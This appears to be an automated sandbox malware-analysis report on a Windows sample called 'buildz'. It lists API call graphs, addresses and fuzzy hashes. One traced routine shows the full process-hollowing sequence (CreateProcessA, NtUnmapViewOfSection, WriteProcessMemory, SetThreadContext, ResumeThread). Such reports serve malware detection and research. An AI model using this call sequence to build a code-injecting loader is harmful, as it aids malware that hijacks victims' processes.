                          • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                          • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                          APIs
                          • std::exception::exception.LIBCMT ref: 0044F251
                            • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                          • __CxxThrowException@8.LIBCMT ref: 0044F266
                            • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                          • String ID: TeM
                          • API String ID: 757275642-2215902641
                          • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                          • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                          • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                          • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

                          Execution Graph

                          Execution Coverage:1.2%
                          Dynamic/Decrypted Code Coverage:97.4%
                          Signature Coverage:0%
                          Total number of Nodes:39
                          Total number of Limit Nodes:7
                          execution_graph 32038 a42000 32041 a42026 32038->32041 32042 a42035 32041->32042 32045 a427c6 32042->32045 32046 a427e1 32045->32046 32047 a427ea CreateToolhelp32Snapshot 32046->32047 32048 a42806 Module32First 32046->32048 32047->32046 32047->32048 32049 a42815 32048->32049 32051 a42025 32048->32051 32052 a42485 32049->32052 32053 a424b0 32052->32053 32054 a424c1 VirtualAlloc 32053->32054 32055 a424f9 32053->32055 32054->32055 32055->32055 32056 2280000 32059 2280630 32056->32059 32058 2280005 32060 228064c 32059->32060 32062 2281577 32060->32062 32065 22805b0 32062->32065 32068 22805dc 32065->32068 32066 228061e 32067 22805e2 GetFileAttributesA 32067->32068 32068->32066 32068->32067 32070 2280420 32068->32070 32071 22804f3 32070->32071 32072 22804fa 32071->32072 32073 22804ff CreateWindowExA 32071->32073 32072->32068 32073->32072 32074 2280540 PostMessageA 32073->32074 32075 228055f 32074->32075 32075->32072 32077 2280110 VirtualAlloc GetModuleFileNameA 32075->32077 32078 228017d CreateProcessA 32077->32078 32079 2280414 32077->32079 32078->32079 32081 228025f VirtualFree VirtualAlloc Wow64GetThreadContext 32078->32081 32079->32075 32081->32079 32082 22802a9 ReadProcessMemory 32081->32082 32083 22802e5 VirtualAllocEx NtWriteVirtualMemory 32082->32083 32084 22802d5 NtUnmapViewOfSection 32082->32084 32085 228033b 32083->32085 32084->32083 32086 228039d WriteProcessMemory Wow64SetThreadContext ResumeThread 32085->32086 32087 2280350 NtWriteVirtualMemory 32085->32087 32088 22803fb ExitProcess 32086->32088 32087->32085

                          Control-flow Graph

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02280156
                          • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0228016C
                          • CreateProcessA.KERNELBASE(?,00000000), ref: 02280255
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02280270
                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02280283
                          • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0228029F
                          • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022802C8
                          • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022802E3
                          • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02280304
                          • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0228032A
                          • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02280399
                          • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022803BF
                          • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 022803E1
                          • ResumeThread.KERNELBASE(00000000), ref: 022803ED
                          • ExitProcess.KERNEL32(00000000), ref: 02280412
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                          • String ID:
                          • API String ID: 93872480-0
                          • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                          • Instruction ID: eceb0348b9e7ae7bb459848f0410b119c72afaf59d3777ec3700d94d48aaa31e
                          • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                          • Instruction Fuzzy Hash: 10B1C574A00209AFDB44CF98C895F9EBBB5BF88314F248158E908AB395D771AE45CF94

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 15 2280420-22804f8 17 22804fa 15->17 18 22804ff-228053c CreateWindowExA 15->18 19 22805aa-22805ad 17->19 20 228053e 18->20 21 2280540-2280558 PostMessageA 18->21 20->19 22 228055f-2280563 21->22 22->19 23 2280565-2280579 22->23 23->19 25 228057b-2280582 23->25 26 22805a8 25->26 27 2280584-2280588 25->27 26->22 27->26 28 228058a-2280591 27->28 28->26 29 2280593-2280597 call 2280110 28->29 31 228059c-22805a5 29->31 31->26
                          APIs
                          • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02280533
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateWindow
                          • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                          • API String ID: 716092398-2341455598
                          • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                          • Instruction ID: f805dc5cd9b8c8de52416976089daf9c5ad571ce53583596c8908c015fb4bf89
                          • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                          • Instruction Fuzzy Hash: D2511870D08388DAEB11DBE8C849BDDBFB2AF11708F144058D5447F2CAC3BA9658CB66

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 32 22805b0-22805d5 33 22805dc-22805e0 32->33 34 228061e-2280621 33->34 35 22805e2-22805f5 GetFileAttributesA 33->35 36 2280613-228061c 35->36 37 22805f7-22805fe 35->37 36->33 37->36 38 2280600-228060b call 2280420 37->38 40 2280610 38->40 40->36
                          APIs
                          • GetFileAttributesA.KERNELBASE(apfHQ), ref: 022805EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID: apfHQ$o
                          • API String ID: 3188754299-2999369273
                          • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                          • Instruction ID: 2025f1f08d3e70fbe3c8a1ce789f1f176e1347855f09d90703f9378db9f42b81
                          • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                          • Instruction Fuzzy Hash: AF011E70C0525DEADB10EBD8C5183AEBFB5AF41308F148099C4092B282D7B69B58CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 41 a427c6-a427df 42 a427e1-a427e3 41->42 43 a427e5 42->43 44 a427ea-a427f6 CreateToolhelp32Snapshot 42->44 43->44 45 a42806-a42813 Module32First 44->45 46 a427f8-a427fe 44->46 47 a42815-a42816 call a42485 45->47 48 a4281c-a42824 45->48 46->45 52 a42800-a42804 46->52 53 a4281b 47->53 52->42 52->45 53->48
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A427EE
                          • Module32First.KERNEL32(00000000,00000224), ref: 00A4280E
                          Memory Dump Source
                          • Source File: 00000004.00000002.2188854432.0000000000A42000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A42000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_a42000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFirstModule32SnapshotToolhelp32
                          • String ID:
                          • API String ID: 3833638111-0
                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                          • Instruction ID: b75872d7c05aaa6af3ebd73949656246afa722e03cde56d0cdafa15a7ac092a9
                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                          • Instruction Fuzzy Hash: 4DF062392007116BE7203BB5AC8DBAE76E8BF99765F500528F642910C0DB70EC454761

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 54 a42485-a424bf call a42798 57 a424c1-a424f4 VirtualAlloc call a42512 54->57 58 a4250d 54->58 60 a424f9-a4250b 57->60 58->58 60->58
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A424D6
                          Memory Dump Source
                          • Source File: 00000004.00000002.2188854432.0000000000A42000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A42000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_a42000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                          • Instruction ID: 027c5a8b5ade80c4bc36119b4ce6432376b288a5e1e9e7b096e0a19d6a4ec748
                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                          • Instruction Fuzzy Hash: 29113F79A00208EFDB01DF98C985E99BBF5EF08350F458094F9489B361D775EA50DF80

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 553 22a6437-22a6440 554 22a6442-22a6446 553->554 555 22a6466 553->555 554->555 557 22a6448-22a6459 call 22a9636 554->557 556 22a6468-22a646b 555->556 560 22a645b-22a6460 call 22a5ba8 557->560 561 22a646c-22a647d call 22a9636 557->561 560->555 566 22a6488-22a649a call 22a9636 561->566 567 22a647f-22a6480 call 22a158d 561->567 572 22a64ac-22a64cd call 22a5f4c call 22a6837 566->572 573 22a649c-22a64aa call 22a158d * 2 566->573 570 22a6485-22a6486 567->570 570->560 582 22a64cf-22a64dd call 22a557d 572->582 583 22a64e2-22a6500 call 22a158d call 22a4edc call 22a4d82 call 22a158d 572->583 573->570 589 22a64df 582->589 590 22a6502-22a6505 582->590 592 22a6507-22a6509 583->592 589->583 590->592 592->556
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                          • String ID:
                          • API String ID: 1442030790-0
                          • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                          • Instruction ID: cd20316c2129b0b940ade52fb125eff83c8d0e15598ad8805882f7a4bd429f7d
                          • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                          • Instruction Fuzzy Hash: 5221D135124701AFEF313FE5C821E2B7BEADF41B60F548429E44855CACEB628560DE50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 597 22a3f16-22a3f2f 598 22a3f49-22a3f5e call 22abdc0 597->598 599 22a3f31-22a3f3b call 22a5ba8 call 22a4c72 597->599 598->599 605 22a3f60-22a3f63 598->605 606 22a3f40 599->606 607 22a3f77-22a3f7d 605->607 608 22a3f65 605->608 611 22a3f42-22a3f48 606->611 609 22a3f89-22a3f9a call 22b0504 call 22b01a3 607->609 610 22a3f7f 607->610 612 22a3f6b-22a3f75 call 22a5ba8 608->612 613 22a3f67-22a3f69 608->613 621 22a3fa0-22a3fac call 22b01cd 609->621 622 22a4185-22a418f call 22a4c9d 609->622 610->612 614 22a3f81-22a3f87 610->614 612->606 613->607 613->612 614->609 614->612 621->622 627 22a3fb2-22a3fbe call 22b01f7 621->627 627->622 630 22a3fc4-22a3fcb 627->630 631 22a403b-22a4046 call 22b02d9 630->631 632 22a3fcd 630->632 631->611 639 22a404c-22a404f 631->639 634 22a3fcf-22a3fd5 632->634 635 22a3fd7-22a3ff3 call 22b02d9 632->635 634->631 634->635 635->611 640 22a3ff9-22a3ffc 635->640 641 22a407e-22a408b 639->641 642 22a4051-22a405a call 22b0554 639->642 644 22a413e-22a4140 640->644 645 22a4002-22a400b call 22b0554 640->645 646 22a408d-22a409c call 22b0f40 641->646 642->641 650 22a405c-22a407c 642->650 644->611 645->644 653 22a4011-22a4029 call 22b02d9 645->653 654 22a40a9-22a40d0 call 22b0e90 call 22b0f40 646->654 655 22a409e-22a40a6 646->655 650->646 653->611 660 22a402f-22a4036 653->660 663 22a40de-22a4105 call 22b0e90 call 22b0f40 654->663 664 22a40d2-22a40db 654->664 655->654 660->644 669 22a4113-22a4122 call 22b0e90 663->669 670 22a4107-22a4110 663->670 664->663 673 22a414f-22a4168 669->673 674 22a4124 669->674 670->669 675 22a416a-22a4183 673->675 676 22a413b 673->676 677 22a412a-22a4138 674->677 678 22a4126-22a4128 674->678 675->644 676->644 677->676 678->677 679 22a4145-22a4147 678->679 679->644 680 22a4149 679->680 680->673 681 22a414b-22a414d 680->681 681->644 681->673
                          APIs
                          • _memset.LIBCMT ref: 022A3F51
                            • Part of subcall function 022A5BA8: __getptd_noexit.LIBCMT ref: 022A5BA8
                          • __gmtime64_s.LIBCMT ref: 022A3FEA
                          • __gmtime64_s.LIBCMT ref: 022A4020
                          • __gmtime64_s.LIBCMT ref: 022A403D
                          • __allrem.LIBCMT ref: 022A4093
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022A40AF
                          • __allrem.LIBCMT ref: 022A40C6
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022A40E4
                          • __allrem.LIBCMT ref: 022A40FB
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022A4119
                          • __invoke_watson.LIBCMT ref: 022A418A
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                          • String ID:
                          • API String ID: 384356119-0
                          • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                          • Instruction ID: 8804e05aff1ce037f673371cf79ffb062e0ab78be8e345422709b0543124bf07
                          • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                          • Instruction Fuzzy Hash: 8E710D71A20717ABD715EEF9CC51B9AB3B9BF00364F144179E514E7A84EBB0E900CB90

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                          • String ID:
                          • API String ID: 3432600739-0
                          • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                          • Instruction ID: 3ab3fb2696edaec58bd60e6de6dcf17a3a6864c1ba3acf1965ded6d85b388a5a
                          • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                          • Instruction Fuzzy Hash: 9F412532920305EFDF00AFE8D960BAE3BFAAF04714F148429E91496998DBB98544DF51

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 746 22a84ab-22a84d9 call 22a8477 751 22a84db-22a84de 746->751 752 22a84f3-22a850b call 22a158d 746->752 753 22a84ed 751->753 754 22a84e0-22a84eb call 22a158d 751->754 759 22a850d-22a850f 752->759 760 22a8524-22a855a call 22a158d * 3 752->760 753->752 754->751 754->753 761 22a851e 759->761 762 22a8511-22a851c call 22a158d 759->762 771 22a856b-22a857e 760->771 772 22a855c-22a8562 760->772 761->760 762->759 762->761 776 22a858d-22a8594 771->776 777 22a8580-22a8587 call 22a158d 771->777 772->771 773 22a8564-22a856a call 22a158d 772->773 773->771 780 22a85a3-22a85ae 776->780 781 22a8596-22a859d call 22a158d 776->781 777->776 784 22a85cb-22a85cd 780->784 785 22a85b0-22a85bc 780->785 781->780 785->784 787 22a85be-22a85c5 call 22a158d 785->787 787->784
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ExitProcess___crt
                          • String ID:
                          • API String ID: 1022109855-0
                          • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                          • Instruction ID: a50f6ef07ef279deda81d85adced3eb9cb4b4afaa78aecbaab13410a200e5e12
                          • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                          • Instruction Fuzzy Hash: 5831E331910351DFCB21AF94FC9088977E6FB14334B05862AEE08576B8CBB059C8AF92
                          APIs
                          • std::exception::exception.LIBCMT ref: 022CFC1F
                            • Part of subcall function 022B169C: std::exception::_Copy_str.LIBCMT ref: 022B16B5
                          • __CxxThrowException@8.LIBCMT ref: 022CFC34
                          • std::exception::exception.LIBCMT ref: 022CFC4D
                          • __CxxThrowException@8.LIBCMT ref: 022CFC62
                          • std::regex_error::regex_error.LIBCPMT ref: 022CFC74
                            • Part of subcall function 022CF914: std::exception::exception.LIBCMT ref: 022CF92E
                          • __CxxThrowException@8.LIBCMT ref: 022CFC82
                          • std::exception::exception.LIBCMT ref: 022CFC9B
                          • __CxxThrowException@8.LIBCMT ref: 022CFCB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                          • String ID: leM
                          • API String ID: 3569886845-2926266777
                          • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                          • Instruction ID: 46f70d599434b208c456d89837c02711d4d00b0cb24358d1ed8e541d58a199f5
                          • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                          • Instruction Fuzzy Hash: 1311DA79C0030DBBCF05FFE5D865CDDBB7DAE04384B408566A91897644EB74A3588F94
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free_malloc_wprintf$_sprintf
                          • String ID:
                          • API String ID: 3721157643-0
                          • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                          • Instruction ID: 4a269a266fe9ddef6bd35803b32236535e24b5849109853fb4cf90125dd8379c
                          • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                          • Instruction Fuzzy Hash: 3F1127B25216506FC26172F40C21FFF3BDD9F45711F440169FE4CD1588DA189A149BB1
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw$_memset$_malloc_sprintf
                          • String ID:
                          • API String ID: 65388428-0
                          • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                          • Instruction ID: e28dd000a76906977de2140a32167547b281fd64df273a20851a33d4ba57962f
                          • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                          • Instruction Fuzzy Hash: F2513871D4020AABEF11DBE5DC86FEEBBB9FF04744F100025F909B6184EB746A158BA5
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw$_memset_sprintf
                          • String ID:
                          • API String ID: 217217746-0
                          • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                          • Instruction ID: debfd39696a1d7fc11110e5f8c18f0611720ee3bbf853496d49abcb222b573dc
                          • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                          • Instruction Fuzzy Hash: 65519CB1A50249ABEF11EFE1CD46FEEBBB8BB04704F100025F905B6184D7B4AA058BA4
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw$_memset_sprintf
                          • String ID:
                          • API String ID: 217217746-0
                          • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                          • Instruction ID: b1df6ebe92a065a8b01caf03083d130f0919178d61b2a58b02a08811bbc9398a
                          • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                          • Instruction Fuzzy Hash: 9C516D71D50209ABDF21EFE1DD46FEEBBB9BF04704F100129E905B6184E774AA058BA4
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                          • String ID:
                          • API String ID: 3534693527-0
                          • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                          • Instruction ID: 96d231bceb745d0774c747a14881f1f3b3bea6f6f515caa54ab0254a0bb06649
                          • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                          • Instruction Fuzzy Hash: 3831D672930322EBDB217AE49C00B6E2755AF15B25F20471AED04EB69CDFB48540CAA1
                          APIs
                          • __getptd_noexit.LIBCMT ref: 023466DD
                            • Part of subcall function 022A59BF: __calloc_crt.LIBCMT ref: 022A59E2
                            • Part of subcall function 022A59BF: __initptd.LIBCMT ref: 022A5A04
                          • __calloc_crt.LIBCMT ref: 02346700
                          • __get_sys_err_msg.LIBCMT ref: 0234671E
                          • __invoke_watson.LIBCMT ref: 0234673B
                          • __get_sys_err_msg.LIBCMT ref: 0234676D
                          • __invoke_watson.LIBCMT ref: 0234678B
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                          • String ID:
                          • API String ID: 4066021419-0
                          • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                          • Instruction ID: 8c016e97d47bc8d84ec44ae6414b5165a16540fc6d58c9a1d11ba7a4486e45a2
                          • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                          • Instruction Fuzzy Hash: E511B6716017146BEB217E659C42FAB7BCEDF02760F0004A6FD0896A41EB65E9008EE4
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: D
                          • API String ID: 2102423945-2746444292
                          • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                          • Instruction ID: 2605ee6d1fa0e38c0b0c1b428c0071d657d9256ea9b7e2806ad3430655c0cf26
                          • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                          • Instruction Fuzzy Hash: C5E16A71D1021AEBDF24DBE0CD89FEEB7B8BF04304F144169E909A2194EB746A45CF54
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: $$$(
                          • API String ID: 2102423945-3551151888
                          • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                          • Instruction ID: f620d5b1e4e2949f574d6481512835dadba9d04f4d057cab97ec2c406f137f6d
                          • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                          • Instruction Fuzzy Hash: 3C91AB71C112099BEF20DFE0C859BEEBBB5AF05308F244169D405B72C4DBB69A48CFA5
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcsnlen
                          • String ID: U
                          • API String ID: 3628947076-3372436214
                          • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                          • Instruction ID: 5a3a7e4afeec101c9b0bf8d9a110910f53b7e3a74c1de90c7b12fd9c559b1955
                          • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                          • Instruction Fuzzy Hash: 1D215B32A34309BBEB009AE4AC54BBF739DDF45350F900065F908C6998FF70E9548AA0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2280000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: p2Q
                          • API String ID: 2102423945-1521255505
                          • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
